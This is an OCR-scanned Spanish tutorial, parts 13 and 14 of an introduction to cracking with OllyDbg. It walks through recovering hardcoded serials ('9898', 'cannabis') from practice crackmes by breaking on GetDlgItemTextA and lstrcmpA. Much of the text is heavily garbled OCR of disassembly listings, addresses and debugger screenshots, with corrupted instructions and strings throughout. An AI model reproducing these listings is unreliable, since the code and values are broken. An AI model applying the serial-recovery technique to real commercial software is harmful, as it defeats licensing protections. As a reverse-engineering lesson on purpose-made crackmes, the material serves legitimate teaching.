MOU EDx,Leccion_. 00403008 
MOU EBX, DWORD PTR E ES 


mn . ss 


A LTS 


Ya la aclaración nos muestra que son iguales, por lo cual se restaran y dará cero el resultado el flag Z se 
activara al ejecutar la comparación con f7 


IP Ba4B107r2 L 


o ES 

1 E al 

E ito BLFFFFFFF 

qu ito BLFFFFFFF 
7FFDFOBAL 


¡DANDO m 


stErr ERROR_SUCCESS 
B246 (NO,NB,E,BE,NS 


y -8.1543 
arma el INIA 


175) 
pá 

“5 
m 
D 


Allí lo vemos y como el JE salta al estar el FLAG Z activo. 


MOU EDxX,Leccion_. 00403008 ASCII "FIACA” 
MOU EBX,DWORD PTR DS: [403010] 
32 CMP_EBX, DWORD PTR DS: [403008] 


Style = MB_OK¡MB_APPLMODAL 
Title = NULL 


PUSH Leccion_. 00402035 Text = "Mal Muy MAL” 
PUSH DWORD PTR SS: [EBP+8] hOwnexr 
MessageBoxA 
= MB_OK¡MB_APPLMODAL 
= NULL 
PUSH Leccion_. 004020283 ex "Muy BIENGi¡ii” 
PUSH DWORD PTR SS: [EBP+8] hOwnex 
MessageBoxA 


CMP EAXx, 108 


p” CALL to RA from Leccion_.00401093 

Es hOwner = Bb4 A ("Leccion 13 by RedHBwK «1 Lose ] 
=3 Text uy BIENTLii” 

= Title = NULL 

E Style = MB_OK¡MB_APPLMODAL 


RETURN to use «77018734 


Allí veo en el stack cuando para en la api, que va a salir el cartel bueno 


Bueno aunque olvidamos cambiarle el titulo a la ventana pero no importa hallamos el serial correcto de 
nuestro primer y mas sencillo hardcoded. 


El siguiente es el mismo crackme que me facilito mi amigo REDHAWK, este segundo es el original que 
me hizo, el anterior lo modifique un poco yo jeje (por eso por vagancia no le cambie el titulo del 


MessageBoxaA correcto jejeje) 


Abramos el LECCION 13 HARDCODED 2 en el OLLYDBG 


MOU DWORD PTR DS: [403008], EAX 


CALL <JMP.£comot 132. In itCommonControls> 
PUSH B 


PUSH Leccion_.0040102E 
PUSH B 


PUSH 65 
PUSH DWORD PTR DS: [403008] 


pModu le = NULL 
GetModu leHandleA 


hInst = NULL 
CALL <JMP. tuser32.DialogBoxParamA> DialogBoxParamA 
PUSH O ExitCode = B 
CALL <JMP.£kernel32.Ex itProcess> 


PUSH_EBP 

MOU EBP,ESP 

MOU EAX, DWORD PTR SS: [EBP+C] 
CMP EAX, 110 


CMP EAx, 111 
a3 ene pra P RSS: a 


PUSH 14 

PUSH Leccion_. 00403900 

PUSH 3EA 

PUSH DWORD PTR SS: [EBP+8] 

CALL _<JMP.tuser32.GetDlgltenTextA> 
MOU EBx,DWORD PTR DS: [493060] 

MOU EDX, DWORD PTR DS: [40204B] 


CmP o Tiao 


ExitProcess 


hlind 
GetDlgltemTextA 


PUSH B ¿OK MB_APPLMODAL 
PUSH O JUEL 
PUSH Leccion_.B0402035 tal Muy MAL” 
PUSH DWORD PTR SS: [EBP+81 
PUSH B Sty IKiMB_APPLMODAL 
PUSH Leccion_.60402041 Tit Pp 

io Te IENtTiti” 


eccion_. 
PUSH DWORD PTR SS: [EBP+81 
pa ESAS APURE 


MP DWORD PTR SS: [EBP+10],3EC 


hOwner 
MessageBoxA 


Como ven es muy similar pero en las strings no aparece la clave correcta. 


¿CERO TUS can os EN 
-, 1 for Name (label) in current module 
e Find references to »| Name in all modules 
E ie » a y 

Copy to executable » ta 
E ñas > Sequence of commands 

| Constant 
Appearance » | Binary string 


All intermodular calls 
All cormmands 

All sequences 

All constants 

All switches 


dx] en] visi $50] 9] +] L]EJM)T]W)H]C]/]K]B]1 


Address |Disassembly Text string 


nitia selection 
ASCII "Mal Muy MAL” 


. 10402035 


664010738| PUSH Leccion_ 


No se ve FIACA, ni ninguna otra posible por ahí jeje 
Igual en este la clave es otra, no es FIACA, jeje. 


Pues como ya sabemos como es el procedimiento directamente vayamos a la parte de la comparación 


Es 3A000090 LietOlgltemTextA 
8 EBX, Du PTR DS: [40300C 
2B15 48204001 MOV EDX,DWORD PTR DS: [402048] 
3BDA CMP_EBX, EDX 
Style = MB_OKi¡MB_APPLMODAL 

6A Ba Title = NULL 
Fe 35204000 |PUSH Leccion_. 00402035 Text = "Mal Muy MAL” 

FF7S 08 PUSH DWORD PTR SS: [EBP+8] hOwnex 
=- pias MessageBoxA 
Sh 06 PUSH B Style = MB_OKiMB_| APPLMODAL 
638 41204000 |PUSH Leccion_ SSA Title = "Bravoiili” 
63 28204000 |PUSH Leccion_.B04020 Text = "Muy BIENiii 
FF75 08 PUSH DWORD PTR SS: fEBP+0] hOwner 
= A MessageBoxA 
817D 10 ECOS[ CMP DWORD PTR SS: [EBP+10],3EC 
68 EAB3000B | PUSH SEA ControlID = SEA (1982. ) 
FF75 08 PUSH DWORD PTR SS: [EBP+8] EE 
Es sabo00B0a GetDlgltemTextA 
£B1D TFT » : 
2B15 48204001 MOU EDX, DWORD PTR DS: [402048] 
a CMP_EBX, EDX 
6A an PUSH U Style = MB_OKiMB_APPLMODAL 
6A qn Enel B Ñ NULL 
68 35204000 |PUSH Leccion_.00402035 Text = "Mal Muy MAL” 

PUSH DWORD PTR SS: [EBP+8] hOwner 

ES AS MessageBoxA 
6A qn PUSH A Style = MB_OK:MB_APPLMODAL 
68 41204000 |PUSH Leccion_.00402041 E = "Bravoiiti” 
68 28204008 |PUSH Leccion_. 00402028 Text = "Muy BIENi¡iii” 
FF7S 08 PUSH DWORD PTR SS: TESP+0] hOwner 
ES 59000008 MessageBoxA 
17D 18 ECa31 CMP DWORD PTR SS: [EBP+10],3EC 


A AL 


(Verificar) (Cali) 


Allí tipeamos un serial falso en este caso LUCKY 


Leccion 13 by RedHawK .: [CracksLatino...(X) 


Serial 


¡LUCKY Ñ 


[Verificar] CC Saw] 


Apreto VERIFICAR 


. rrr>a uo FTuU>sn DWUMRL Fin 223; LEDTTOJ Leceo 
. ES SABBBBBa GetDlgltemTextA 
. 8B1D 0C30409 la : [40 s| 

ba40156 . 8B15 46204001 E EDX, DWORD PTR Ds: [462646] 

6n4010 . 3BDA CMP EBXx, EDXx 

bo4u1072|| e 74 13 JE SHORT Leccion_.20401087 

004610 . SA 00 PUSH B 

15) 45 


= MB_OKiMB_APPLMODAL 
= NULL 
: = "Mal Muy MAL” 


6A Ba PUSH B 
68, 35204000 PUSH Leccion_. 00402035 


DUCU MiNDN DTD 22. FEDDLOT 


Ed 
EJ 


Y para en el BPX veremos que compara en este caso, esta pasando a EBX el contenido de la memoria 
40300C, veámosla en el DUMP. 


Allí vemos que al ejecutar la línea, moverá los 4 bytes a EBX, siempre invirtiéndolos ya vimos que 
cuando lee de la memoria y pasa el contenido a un registro se invertirán. 


Leccion_. 


Leccion_. 00401064 


ca ; DLFFFFFFFF) 
Pl O(FFFFFFFE) 
AD O(FFFFFFFF) 
ZO ; BLFFFFFFFF) 
An it ?FFDEGGB(FFF) 


Apreto F7 y allí están en EBX , al ser un MOV EBX, DWORD PTR DS: [40300C] se mueven solo 
cuatro bytes (DWORD) 


40 . 68 PUSH 3EA 
a z 25 PUSH OWORD PTR SS: CEBP+8] 
44 > S 
. S8B10D 0 4001 MOU EBX, DWORD PTR DS: [40306C] 
. 2B15 48204001 MOU EDX, DWORD PTR DS: [40204BJ 
. 3BDA CMP_EBX,EDXx 
.v 74 13 
5A Ba PUSH O 


Esta pasando los cuatro bytes que corresponden a la string 9898 que en este caso es el serial correcto ya 
que compara estos 4 bytes con los 4 primeros de LUCKY y si son iguales verificamos que salta a la zona 


de MUY BIEN, en este caso no saltara, pero si llegamos hasta poder volver a ingresar la clave y tipeamos 
9898. 


Leccion 13 by RedHowK  .: [CracksLatino...(X] 


Serial De 


19898 


Apreto VERIFICAR 


Cl PUSH DWORD PTR SS: LEBP+ 


MOU EBX, DWORD PTR DS: [4 
os rd PTR DS: [4 


PUSH Leccion_. 00402035 
PUSH DWORD PTR SS: [EBP+ 


PUSH B 

PUSH Leccion_.B0402041 

PUSH Leccion_. 10402023 

PUSH DWORD PTR SS: [EBP+ 


CMP DWORD PTR SS: [EBP+1 


JNZ SHORT Leccion_.0049 
PUSH A 
PUSH DWORD PTR SS: [EBP+ 


En la comparación de EBX y EDX ambos son iguales son 38393839 que son los bytes correspondientes a 
la cadena 9898 que ingresamos y por supuesto saltara al cartel MUY BIEN, 


Frusn 2EMn GUONVLIDLILD -= DEM 1LIUUC. ) 
PUSH DWORD PTR SS: [EBP+8] hlnd 
CALL _<JMP.Suser32.GetDlgltemTextA> GetDlgltemTextA 
MOU EBx,DWORD PTR DS: [46300C] 
Of MOU EDxX, DWORD PTR DS: [402048] 
CMP_EBXx, EDX 
PUSH B Sty MB_OKiMB_APPLMODAL 
PUSH O NULL 
PUSH Leccion_.00402035 "Mal Muy MAL” 
PUSH DWORD PTR SS: [EBP+8] hOwner 
MessageBoxA 
PUSH M St 8 cine AS 
PUSH Leccion_.00402041 "Br 
PUSH Leccion_. 00402028 = "Muy PIENTI [ ES 
PUSH DWORD PTR SS: [EBP+8] hOwner 
MessageBoxA 


eccion 13 by RedHawK .: [CracksLatino...[X' 


Vemos que en este que hizo mi amigo si sale el titulo BRAVO, jeje ya que no estaba vago como yo, jua 
jua, la cuestión que sacamos el serial correcto también, que en este caso es 9898. 


Ahora iremos incrementando la dificultad tenemos dos hardcoded mas difíciles ya no tan directos, el 
ultimo no apto para cardiacos pero bueno pueden ir viendo en ellos, como se aplican las técnicas de 
crackeo para casos mas difíciles. 


Como ustedes pensaron que yo solo iba a trabajar y ustedes nada, pues no, aquí trabajamos todos, hay un 
tercer crackme que harán ustedes (mielecrackme1.zip), que queda como tarea para la próxima parte 14, en 
la cual estará resuelto y explicado por mi, al igual que los otros dos que tenemos pendientes, lo que si les 
aconsejo hacerlo pues la parte 14 vendrá en un rar con password y el password para abrirlo, será el serial 
correcto de este crackme, jeje así que deben trabajar si o si (Que malvado jeje) 


Como ayuda les digo que la api IstrcmpA que utiliza este crackme, es una api que se utiliza directamente 
para comparar strings, cuando lleguen a esa api, verán en los parámetros en el stack, las dos strings 
comparadas por la misma. 


En la parte 14 les mostrare bien como funciona y seguiremos con los dos hardcoded, mas difíciles, pero 
antes deben practicar con algo sencillo, por eso el crackme que agregue aquí y que es obligatorio para 
seguir adelante jeje. (malo, malo eres jeje) 


Hasta la parte 14 
Ricardo Narvaja 
03 de diciembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG PARTE 14 


Bueno antes que nada vamos a explicar como se soluciona el crackme que deje como tarea en la parte 13. 


— — View —— E Options Window Help 


PUSH B piModule = NULL 


50 

Es F1020000 Ex itProcess 
55 PUSH_EBP 

2BEC MOU EBP,ESP 

8304 BB ADD ESP,-58 

0745 DA 30001 MOU DWORD PTR SS: CEBP-30],30 
17485 Nn4 ASARL MANU MINRA PTR SS: PFRP-28.1.2 


. ES o Pa30000 GetModu leHandleA 
6071]. AS FC3649008 |MOU DWORD PTR DS: [4039FC],EAX 
Goc||: ES 17030008 | CALL <JMP.£KERNELS2. GetCommandLinen> CGetCommandL ineA 
611]. AS 60714009 |MOU DWORD PTR DS:[403100],EAX 
o16||. 6A0A PUSH BA BOBBBBDA 
a . FF3S 140901 PUSH DWORD PTR DS: [4031001] (/215J=12/2]3]=] 
. 6A 00 PUSH A (J2151=12/2]3]=] 
+ FF35 FC30400l PUSH DWORD PTR_DS: [4930FCJ Argl = BBBBBBADS 
. ES 06000000 | CALL crackme. 00401031 cracknme. 00491931 
. PUSH EAX Ex itCode 
5 


Allí esta el mielecrackme abierto en OLLYDBG, y detenido en el ENTRY POINT, veamos las apis que 
utiliza con SEARCH FOR-NAME (LABEL) IN CURRENT MODULE. 


63 Es304008 | PUSH crackme. dd40398s leStrina2 = "cannabis" 
68 37304000 | PUSH crackme. 40483 
ES E70B0008 | CALL-<JMP.£KERNELS Backup » 


SECO OR_EAX, EAX 

75 16 Copy » 

6A 68 ¿EPPLMODAL 
» 


PUSH crackme. 00493 Binary 


68 7E304009 
68 _SE304006 [PUSH crackme. 00403 red the right passwordt” 


FF7S as PUSH DWORD PTR SS: 

lc 

éS E7aosaca PUSH kme. 09493 pan aa 

cracknme. 

68 80304000 H orackme. 00493 Comment , low should try again, ¡it's sooo easytt 

FF75_8s PUSH BUORD PTA SS: , 

ES próbaooa CALL SUMP.CUSERSE:| Breakpoint La E 
FS 


PESE pa31ag0l PÚSH DUORD_ PTR_DS: i 
ES S2000000 Hit trace 


v 
pd 


66:30 2r01 [ONE as, 127 Run trace » 
cies ta SHR_EAX, 10 
76 14 AECSUDAN crac New origin here Ctri+Gray * 
éS F?soaaga | PUSH erackme. 00493 Go to » coo 
crackme. 
es craodena [PUSH exackne 00493 vin32asm by Miele. Greetz to Dettent 
: ii » 
ES ¿gosooso Follow in Dump 
FE?S 14 USH DUORD PTR SS: View call tree Ctrl+k 
FF7S 18 PUSH DWORD PTR SS: 


31040307E=crackme.0048307E (ASCII "Correctt”) h for Name (label) in current module CtrkN 
Find references to Name in all modules 


Aquí están las apis utilizadas 


Address |Section | Type Comment 
160402048 | .rdata Import (32. Create indowExA 
BO0402028| .rdata | Import 32. DefWindowProcA 
B0402040| .rdata Import z ispatchMessageA 
00402008 | .rdata Import ExitProcess 
B04B200C| .rdata | Import GetCommandLineA 
B0482030| .rdata | Import GetMessageA 
B0402004| .rdata Import y GetModu leHandleA 
100402024! .rdata Import dj 

B0402020| .rdata | Import 
B0402014| .rdata | Import 
00402000 | .rdata Import 
B0482018| .rdata | Import 
D0401000| .text Export 
Ba490201C| .rdata | Import 
00402044 | ..rdata Import 
BO40204C | .rdata | Import 
BO490202C| .rdata | Import 
160402030| .rdata Import 
B0402034| .rdata | Import 
00402038 .rdata | Import |USERS2.Updatellindow 


Allí están las apis que son importantes, GetWindowTextA para ingresar el serial que tipeamos, IstrempA 
como les anticipe en la parte anterior para comparar strings y MessageBoxA para mostrar el mensaje de si 
colocamos el serial correcto o no. 


Podemos poner un BPX en esas apis, para parar cuando ingresa nuestro serial falso, pero en este caso que 
es bien sencillo, podemos hacer mas rápido si miramos las STRINGS que utiliza el programa. 


span parcichas a 
Eo” 


rackme 
rackme! Go to E 


WORD P' 


ded in win32asm by Miele. Greetz to [ 
Follow in Dump > la 


WORD P. Yiew call tree Ctrl+k 
WORD P 


Corr Name (label) in current module Ctrl 


Find references to » Name in all modules 
i » 
pi E tb a Cornimand Ctrl 
pd j iS A Sequence of commands Ctrl 
nalysis 
y | Constant 
Appearance » Binary string Ctrl 


All intermodular calls 
All cormmands 

All sequences 

All constants 

All switches 


tt.butto 
n-Info.C Lear-efinad lahal 


Haciendo SEARCH FOR — ALL REFERENCED TEXT STRINGS sale la lista de STRINGS o 
CADENAS DE TEXTO usadas por el programa veamos. 


mex eu] vis] $0] +] 1]E/m]1]w/n/c] 4]k]B/R]».. s] 


m2] 


Address |Disassemb ly Text_string 

60401071|MOU DWORD PTR_SS: CEBP-8],crackme. 0040301 ASCII "Cracknme' 

604010C1|PUSH crackme. 00403008 ASCII "Crackme 1.0" 

B04010C6| PUSH crackme. 00403090 ASCII "Crackme” 

60401153|PUSH crackme. 00403014 ASCII "edit” 

6040118F|PUSH ocrackme. 00403020 ASCII "Check" 

60401194|PUSH crackme. 00403019 ASCII "button” 

B04011C5|PUSH crackme. 00493002 ASCII "Info” 

B04011CA|PUSH crackme. 004030BB ASCII "button” 

B04011FS| PUSH crackme. B040302D ASCII "Password:"” 

B04011FD|PUSH crackme. 00403026 ASCII "statio” 

B040123E| PUSH crackme. B0403055 ASCII "cannabis” 

00401253| PUSH crackme. 0040307E (Initi 

60401258| PUSH crackme. 604B3BSE ASCII 

00401269| PUSH cracknme. 60403087 ASCII "Nopet 

B040126E| PUSH crackme. 604083080 ASCII "Maybe, you should try again, ¡it's easytt” 
B0401298| PUSH cracknme. 004830F7 ASCII "Info” 

B040129D|PUSH cracknme. 60483007 ASCII "Coded in win32asm by Miele. Greetz to De 


Allí vemos las strings de que acertamos y las que muestra cuando fallamos, si hacemos doble click en 
alguna de ellas, nos llevara a la zona de los MessageBoxA, probemos haciendo doble click en YOU 
ENTERED THE RIGHT PASSWORD (has ingresado el password correcto) 


DDISL ZUVI1 LIMIT HA, 120 ESP 
75 64 JNZ SHORT crackme.B0401288 ERP 
Cies 109 SHR_EAX, 18 ales: 
66:BBC0 OR_AX, AX 3 eb1 
75 50 NZ SHORT crackne. 08491288 A 
6A 1E PUSH 1E Count = 1E (39.) EIP 
68 37304000 [PUSH crackne. 0493037 Buffer = crackme. 00403037 ca 
FF35 04314001 PUSH DWORD PTR DS: [403104] hlind = NULL Pai 
Es A20000008 | CALL <JMP.2USER32.GetllindowTextA> GetWindowTextA AD 
63 55304000 [PUSH cracknme. 60483055 String2 = "cannabis” z1 
68 37304000 [PUSH crackne. 0493037 Stringl = "" so 
ES E7000090 | CALL -<JMP.2KERNELS2. [strompA> IstrompA 10 
DECO OR_EAX, EAX DÓ 
75 16 JNZ SHORT orackme. 00401267 1] 
6A Ba PUSH U de 
68 7E304000 [PUSH oracknme. 6040307E Titl "Correott” EFL 
68 _5E304000 |PUSH cracknme. 0049305E Text "You entered the right passwordt” a 
FF7S BS PUSH DWORD PTR SS: [EBP+5] hOwner 1 
Ear | ME SORT orackmecOBADIZOS dei 
6A Ba PUSH O = MB_OK¡MB_APPLMODAL 
63 8/304000 [PUSH crackne. 00493087 "Nopet” 
68 80364000 |PUSH crackme. 60403080 "Maybe, you should try again, it's sooo easytt 
FF7S_ BS PUSH DWORD PTR_SS: [EBP+5] 
Es 77600000 | CALL <JMP.2USERS2.MessageBorA> MessageBoxA De 
6A Ba PUSH 9 Text = NULL FST 
FF35 04314001 PUSH DWORD PTR DS: [403104] hlind = NULL FCU 
Es 82000000 | CALL <JMP.2USERS2.SetllindowTextA> SetWindowTextA 2 
66:3D 2F01 CMP AX, 12F 
.v 75 33 JNZ SHORT orackme.D04812C1 
00401 + C1E8 18 SHR_EAXx, 10 
rar Z2canca an au ato 


Allí vemos la zona caliente. 


Primero GetWindowTextA como dijimos para ingresar el serial que tipeamos, luego IstrcmpA para 
comparar con el serial correcto, y luego según si son iguales continua al MessageBoxA, con la leyenda 
YOU ENTERED THE RIGHT PASSWORD, y si no son iguales salta al otro MessageBoxA, MAYBE, 
YOU SHOULD TRY AGAIN, IT'S SO EASY, que intentemos de nuevo que es fácil. 


Así que pondremos un BPX, allí en el CALL a la api IstrempA, para ver que compara. 


04D . C1E8S 10 SHR_EAX, 19 
0040 . 66:4MBCA OR_AX, AX 
2042 iv 75 SC JNZ SHORT crackme. 00401288 
0040 . 6A 1E st 1E Count = 1E (38.) 
a04a . 68 37304000 H crackme. 00403037 Buffer = crackme. 00403037 
0040 . FF35 e4s14g0 PUSH DWORD PTR DS: [403104] hlind = NULL 
0040 . Es A2a CALL <JMP. 2 USER32. GetWindowTextA> GetllindowTextA 
0040 . 68 Cs304000 PUSH crackme. 66403055 String2 = "cannabis” 
aBn4a . 68 37304000 |PUSH crackme. 00403037 Stringio= ee 
. ES E7D00000 IstrompA 
. E OR ME 
- 6408... li A Potule = MB_OKIMB_APPLMODAL 


Password: 


Al apretar CHECK para en el BPX que colocamos. 


. ES A2000099_ | CALL <JMP.SUSERS2. GetWindowTextA> ULiGetllindowTextA 

. 68 553064000 |PUSH crackme. 60403055 String2 = "cannabis” 
a . 683 37304000 |PUSH crackme. 00403037 [Sucina - "9g92892” 

. strol 


ES E7r000Bga 
BBCO 


OR _EAX, EAX 


Vemos que OLLY nos aclara los parámetros, los cuales son las dos STRINGS que comparara, en este 
caso vemos que compara la que tipee “989898”, con la palabra “cannabis. 


Al apretar F8 para ejecutar el CALL de la api 


AD DAMA DD 


“DDO mm mmmmammmmiio 


Di 


El resultado dicha api lo muestra en EAX, si es FFFFFFFF o sea -1, es que las strings no son iguales. 


' BO0124F crack 


ODANMNDTDO m 


Como el resultado de la comparación no es cero, no se activa el FLAG Z, y el JNZ salta ya que el FLAG 
Z. es cero. (Recordar que JNZ. salta si el FLAG Z es cero porque es el inverso de JZ que salta cuando el 
FLAG Z esta activo o 1) 


S3>umwuww | uan uraurme. voruovas 
és 37304000 [PUSH crackme. 00403037 

Es E7obaBBs CALL <JMP.£KERNELSZ. LstrompA> 
BECA OR_EAX, EAX 


AS 
tringl = ”989898"” 
LstrompA 


5A a PUSH U 

68 7E304000 (PUSH crackme. OE 

68 S5E304000 |PUSH crackme. 004030 

FF75 08 PUSH DWORD PTR SS: CEbP+81 
= O 


= MB_OKiMB_ APPLMODAL 
"Correct t” 
"vou entered the right passwo 


Mes sagaEONA 
me el ¿MB APPLMODAL 


Al you should try again, 


£A Ba 

68 87304000 [PUSH crackme. 00403087 

68 80304008 |PUSH crackme. 0040308D 

FF7S_ 08 PUSH DWORD PTR_SS: [EBP+85] 

Es 77060008 | CALL-<JMP.SUSERS2.MessageBorA> 
É PUSH O 

FF35 04314001 PUSH DWORD PTR DS: [463104] 

Es 32000000 


66:3D 2F01 |CMP AxX,12F 
3 an ZO e ARANA 


HessageRoxA 


hna = Desquesz (class="Edit” parent 
SetWindowTextA 


E 
E 
[ 
E 


Pues allí salta y va al cartel de error, así que ya sabemos que compara con la palabra cannabis, o sea que 
este es el serial correcto doy RUN nuevamente, acepto el cartel malo. 


Maybe, you should try again, it's sooo easy!! 


Y vuelvo a la ventana para ingresar el serial esta vez tipeo el serial correcto, cannabis. 


m Crackme 1.0 EJ mx) 


Password: hs 


Apreto el botón CHECK y para en el BPX. 


a . ES A2000000 LeerilindouTertA 

a . 68 55304008 |PUSH crackme. 00403055 String2 = "cannabis” 

g . 68 37304008 |PUSH crackme. 00403037 [5: rinal = "cannabis” 
. ES E7000BBB [strompA 


BECO OR_EAX, EAX 
ore 16 JNZ SHORT crackne. 00401267 


Ahora al ser ambas strings iguales el resultado de la api que guarda en EAX es cero, por lo cual se activa 
el FLAGZ. 


EJP 

ci 

PA 

A 1 

7 

D 

O A MlastE 
EFL [ala la pa 
STO empry 


Y el JNZ en este caso no salta al estar el FLAG Z activo. 


. DO DOIUMUUU Fun GIaGuRItE. VUUTtUIVIIO DLFLIYE — GaNIMani> 

. 68 373064008 [PUSH crackme. 00403037 [trino = "cannabis” 

. ES Er060B00n [strompA 

. BECA OR_EAX, EAX 

«¿75 16 

. |6A 60 PUSH B Style = MB_OK¡MB_APPLMODAL 
. |68 7E304008 |PUSH orackme. 0040307E Title = "Correott” 

+. 168 5E304000 [PUSH orackme. 0040305E Text = "You entered the right passwordt" 
. |FF7S 08 PUSH DWORD PTR SS: [EBP+8] hOwner 

. 33 EOS MessageBoxA 

> +6A 00 PUSH O rotule = MB OKiMB APPLMODAL 


Correct! 


You entered the right password! 


Pues esta es la solución del crackme que deje como tarea de la parte 13, jeje, el serial es la palabra 
“Cannabis” 


Sigamos ahora avanzando con HARDCODED SERIALS mas difíciles nos quedan para ver dos. 


El caso siguiente es un paso mas, en este ya no compara directamente el serial que tipeamos sino que 
realiza algunas operaciones antes de comparar veamos el ejemplo, este es el crackmeeasy, abrámoslo en 
OLLYDBG. 


[0] File View Debug Plugins Options Window Help 


a — Em” bie] $0) ul + 1jejm]t[w)jH]c) 4]k)1 


PUSH_EBP 
S9ES MOU EBP,ESP 
33EC us SUB ESP,S 
38304 F4 ADD ESP,-9C 


6A u2 PUSH_2 

A1 24314008 |MOU EAX, DWORD PTR DS: [<émsucrt.__set_appl 
FFDO CALL EAX 

ES POFFFFFF [CALL crakmeeca. 00401180 
Cc9 LEAUE 


A 


PS 


Ya sabemos como ver las apis que utiliza, así que en la lista vemos GetDlgltemTextA, pongámosle un 
BPX en dicha api. 


adn 


2d 0 3 48] 4 12) m] 1/01) c]z 
Address [Section [Type [Mame _______ [Comment 


dress |Seotion |T: Comment 
00403110|.idata Import rm 
BO4030F4|. idata Import r 
B0403130|.idata | Import l 
90403134 .idata | Import 


.atexit 

_cex it 
DialogBoxParamA 
EndDialog 


B04030D4|. idata Import Ex itProcess 
BO4030FS|. idata Import —fileno 
604030FC|. idata Import ._fmode 
B0403100|. idata Import ._fpreset 


B0403008|.idata | Import GetCommandL ineA 
90403138) .idata | Import 
BO04B3130) .idata | Import 
BO4B310C| .idata | Import 
6049030DC |. idata Import 
BO4030E0| .idata | Import 
B0403140|.idata | Import 
B04030E4| .idata | Import 
Ba0403104| .idata | Import 
Ba4B3118| .idata | Import 
60403144 |. idata Import 
DO4011FO| .tent Export 
BO403114|.idata | Import 
00403148 |.idata Import 
B0403108| .idata | Import 


tc. getmainargs 
GetModu leHandleA 
GetStartupInfoA 
etWindowTextLengthA 
«GlobalAl loc 
._iob 

memset 

ER MessageBoxA 

lodu leEntryPoint> 
msucrt.__p__environ 
SetDlgaltemTeztA 
setmode 


BO04030E8| .idata | Import SetUnhandledExceptionFilter 
60403124 |.idata Import t.__set_app_type 

BO40311C|. idata Import t.signal 

BO403120|.idata | Import t.strlen 


En la commandbar tipeo 


Commanc Bp GetDigltemTextA vw|¡BPa 


Program entry point 


Ahora doy RUN con F9 y aparece la ventana para ingresar el serial 


» 
PUSH_EBP 

8BEC MOU EBP,ESP 

FF7S BC PUSH DWORD PTR SS: [EBP+CJ 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] 
ad 


TEST EAXx,EAX 


PUSH DWORD PTR SS: CEBP+14] 
PUSH DWORD SS: [EBP+10] 
su PUSH EAX 

ES FE74FCFF 

EB_0E 

837D 14 00 CMP_DIWORD PTR_SS: [EBP+14],0 
74 D6 


JE SHORT USER32. 77D6AC4C 
2B45 19 MOU EAX, DWORD _PTR_SS: CEBP+10] 
c6ga Ba MOU BYTE PTR DS: [EAX1,0 
3300 Z0R EAX, EAX 
5D POP EBP 
C2 1000 
98 


NOP 


En el stack miro los parámetros 


CALL to Get 
hlind = £ re 
Control 
Buffer 
Count = 9 


["CrackMe”,class='443277B") 


gltemTextA from crakmeea. 004012FE 
da Ura 
(401.) 


Allí vemos el BUFFER donde guardara el serial falso, marco esa línea y hago CLICK DERECHO- 
FOLLOW IN DUMP 


(44.404. 
A E E 


Allí esta el buffer vacío, porque aun no se ejecuto la api, así que hago DEBUG-EXECUTE TILL 
RETURN 


Run F9 


Pause F12 
Restart CtrHF2 
Close AIHF2 
Step into F7 
Step over Fe 
Animate into CtrF? 
Animate over CtrrF8 
Execute till return CtrHF9 
Execute till user code Alt+F9 


MOU EAX, DWORD _PTR_SS: [EBP+1 
MOU BYTE PTR DS: [EAXJI,0 
XOR EAX, ERX 

POP EBP 


EEMEE 
Bo un 
Bo as 
B4 a4 [44.[40. 
A 
A E 


Y veo que en el BUFFER esta ahora el serial falso que ingrese. 


MOU EAX, DWORD PTR SS: CEBP+8] [ 

PUSH EAX hlind 

GetDlgltemTextA 

: 

EAX, crakmeea. 00401222. ASCII "104456789 
DWORD PTR DS: 


¡NODO 


DWORD PTR 
EAX, DWORD PTR SS: [EBP-24] 
ESP, -4 


PUSH B 

PUSH EAX s 
memset 

ADD ESP, 10 

MOU DWORD PTR SS: CEBP-34],0 

LEA ESI,DWORD PTR DS: CESI] 


| ADD ESP,-0C 
LEA EAX, DWORD PTR SS: [EBP-30] 
PUSH EAX 


A 
ADD ESP, 10 

MOU EAX, EAX 

LEA EDX, DWORD PTR DS: [EAX-13 
CMP_DWORD PTR SS: CEBP-10],EDX 


NOP 

LEA ESI,DWORD PTR DS: [ESIJ 
MOU EAX, DWORD PTR SS: LEBP-C] 
MOU EDX, DWORD PTR SS: [EBP-10] 
ADD_EAX, EDX 

MOUSX_EDX, del Ad DS: CEAXI 


Allí veo una larga rutina con un numero constante, que si alguno tuvo la idea de probar si es el serial 
correcto ya sabrá que no lo es jeje. 


Es 4D630009_ CALL _<JMP.2USERS2. GetDlgltemTextA> LGetDlgltemTeztA 

0745 FO 00001 MOU OWORD PTR SS: CEBP-16],0 

co ROS an EAX, orakmeea. 00401222" ASCII "10445678951" 
U EDX, DINORO "ETR DS: [EAX] 

235e DA ÑO DWORD PTR SS: [EBP-38],EDX 

ARA Ads MAY FNZ. AMARA PTR MS: TFAX+41 


Allí mueve 401222 a EAX y en el registro EAX vemos que dicha dirección apunta a la string del numero 
constante. 


0040130F 
ES 
it OLFFFFFFFF) 


faí CECCCECCEC! 


“DO Mm mmmmmmmam 


DO-O DADO 


D 
ñ 

TJ 
+ 


En la siguiente línea como EAX vale 401222, 


MOV EDX,DWORD PTR DS:[EAX] 
En realidad es similar a 


MOV EDX,DWORD PTR DS:[401222] 


MOU EAX, crakmeea. 00401222 Asc 
MOU EDX, DWORD PTR DS: [EAXJ 

MOU DWORD PTR SS: LEBP-30],EDX 

MOU EDX, OWORD PTR DS: [EA*xX+4] 

MOU DWORD PTR SS: LEBP-2C],EDX 

MOU EAX, DWORD PTR DS: [EA*X+8] 

MOU DWORD PTR SS: [EBP-28],EAXx 

LEA EAX, DWORD PTR SS: [EBP-24] 


nnn ECD A 


O sea que mueve el contenido de 401222 a EDX. 


En la aclaración del OLLY se ve bien que son los 4 primeros bytes del numero 10445678951 


3D45 DA 


Sprca 


FA Dilíara AQ £E 


Al ejecutar la línea con F7 se mueven a EDX (siempre se moverán al revés al mover de la memoria a un 
registro) 


? BB4B1311 crakme 
9 ES 9023 S2bit 


La siguiente línea esos bytes que están en EDX los mueve a [EBP-30] 


MOV EDX, DWORD PTR DS: [EAX] 
MOU DWORD PTR SS: [EBP-30],EDX 
MOU EDX, DWORD PTR DS: [EAX+4] 
MOU DWORD PTR SS: [EBP-2C],EDX 


En la aclaración del OLLY vemos que [EBP-30] es en mi maquina 240f9e4, lo busco en el DUMP 


suUu+>o UN LEH EHA 
1-1 a 


mua .. * 


00 02 08 00 
03 as aa 00 
14 008 00 00 
3C 44 B4 an 
a 


<De..B.. 
Yo... ... 
W... Me... 
4...<Do. 
... «OK. 
AS - 


